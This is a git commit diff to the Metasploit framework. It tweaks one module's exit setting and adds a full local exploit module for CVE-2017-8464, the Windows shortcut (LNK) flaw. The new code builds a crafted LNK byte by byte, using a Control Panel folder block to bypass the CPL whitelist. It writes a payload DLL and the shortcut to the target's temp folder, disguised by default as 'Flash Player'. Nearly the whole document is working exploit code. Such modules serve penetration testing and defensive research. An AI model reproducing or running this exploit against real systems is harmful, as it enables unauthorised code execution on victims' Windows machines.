Update the advanced option names and a typo

zeroSteiner · zeroSteiner · commit 825ad940e666 · 2017-10-05T10:16:31.000-04:00
diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
@@ -47,7 +47,7 @@ def initialize(info = {})
           ],
         'DefaultOptions'  =>
           {
-            'EXITFUNC'    => 'process'
+            'EXITFUNC'    => 'thread'
           },
         'Arch'            => [ARCH_X86, ARCH_X64],
         'Payload'         =>
diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb
@@ -0,0 +1,170 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+
+  attr_accessor :exploit_dll_name
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'            => 'LNK Code Execution Vulnerability',
+        'Description'     => %q{
+          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
+          that contain a dynamic icon, loaded from a malicious DLL.
+
+          This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
+          similar except an additional SpecialFolderDataBlock is included. The folder ID set
+          in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
+          the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
+          DLL file.
+
+          If no PATH is specified, the module will use drive letters D through Z so the files
+          may be placed in the root path of a drive such as a shared VM folder or USB drive.
+        },
+        'Author'          =>
+          [
+            'Uncredited',      # vulnerability discovery
+            'Yorick Koster',   # msf module
+            'Spencer McIntyre' # msf module
+          ],
+        'License'         => MSF_LICENSE,
+        'References'      =>
+          [
+            ['CVE', '2017-8464'],
+            ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
+            ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup
+            ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format
+            ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],
+            ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']
+          ],
+        'DefaultOptions'  =>
+          {
+            'EXITFUNC'    => 'thread',
+            'WfsDelay'    => 45,
+          },
+        'Arch'            => [ARCH_X86, ARCH_X64],
+        'Payload'         =>
+          {
+            'Space'       => 2048
+          },
+        'Platform'        => 'win',
+        'Targets'         =>
+          [
+            [ 'Automatic',   { 'Arch' => ARCH_ANY } ],
+            [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
+            [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
+          ],
+        'DefaultTarget'   => 0, # Default target is Automatic
+        'DisclosureDate'  => 'Jun 13 2017'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILENAME', [false, 'The LNK file']),
+        OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),
+        OptString.new('PATH', [false, 'An explicit path to where the files should be written to'])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
+        OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
+        OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
+      ]
+    )
+  end
+
+  def exploit
+    path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
+    arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
+    datastore['EXE::Path'] = path
+    datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
+
+    path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%")
+    path.chomp!("\\")
+
+    dll = generate_payload_dll
+    dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
+    dll_path = write_file("#{path}\\#{dll_name}", dll)
+
+    lnk = generate_link("#{path}\\#{dll_name}")
+    lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
+    lnk_path = write_file("#{path}\\#{lnk_filename}", lnk)
+  end
+
+  def generate_link(path)
+    vprint_status("Generating LNK file to load: #{path}")
+    path << "\x00"
+    display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name
+    comment = datastore['LNK_COMMENT'].dup << "\x00"
+
+    # Control Panel Applet ItemID with our DLL
+    cpl_applet = [
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00
+    ].pack('C*')
+    cpl_applet << [path.length].pack('v')
+    cpl_applet << [display_name.length].pack('v')
+    cpl_applet << path.unpack('C*').pack('v*')
+    cpl_applet << display_name.unpack('C*').pack('v*')
+    cpl_applet << comment.unpack('C*').pack('v*')
+
+    # LinkHeader
+    ret = [
+      0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C
+      0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046
+      0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)
+      0x00, 0x00, 0x00, 0x00, # FileAttributes
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime
+      0x00, 0x00, 0x00, 0x00, # FileSize
+      0x00, 0x00, 0x00, 0x00, # IconIndex
+      0x00, 0x00, 0x00, 0x00, # ShowCommand
+      0x00, 0x00, # HotKey
+      0x00, 0x00, # Reserved1
+      0x00, 0x00, 0x00, 0x00, # Reserved2
+      0x00, 0x00, 0x00, 0x00  # Reserved3
+    ].pack('C*')
+
+    # IDList
+    idlist_data = ''
+    # ItemID = ItemIDSize (2 bytes) + Data (variable)
+    idlist_data << [0x12 + 2].pack('v')
+    idlist_data << [
+      # All Control Panel Items
+      0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
+      0x30, 0x9d
+    ].pack('C*')
+    # ItemID = ItemIDSize (2 bytes) + Data (variable)
+    idlist_data << [cpl_applet.length + 2].pack('v')
+    idlist_data << cpl_applet
+    idlist_data << [0x00].pack('v') # TerminalID
+
+    # LinkTargetIDList
+    ret << [idlist_data.length].pack('v') # IDListSize
+    ret << idlist_data
+
+    # ExtraData
+    # SpecialFolderDataBlock
+    ret << [
+      0x10, 0x00, 0x00, 0x00, # BlockSize
+      0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
+      0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
+      0x14, 0x00, 0x00, 0x00  # Offset in LinkTargetIDList
+    ].pack('C*')
+    # TerminalBlock
+    ret << [0x00, 0x00, 0x00, 0x00].pack('V')
+    ret
+  end
+end

Original file line number	Diff line number	Diff line change
`@@ -47,7 +47,7 @@ def initialize(info = {})`
`47`	`47`	`],`
`48`	`48`	`'DefaultOptions' =>`
`49`	`49`	`{`
`50`		`- 'EXITFUNC' => 'process'`
	`50`	`+ 'EXITFUNC' => 'thread'`
`51`	`51`	`},`
`52`	`52`	`'Arch' => [ARCH_X86, ARCH_X64],`
`53`	`53`	`'Payload' =>`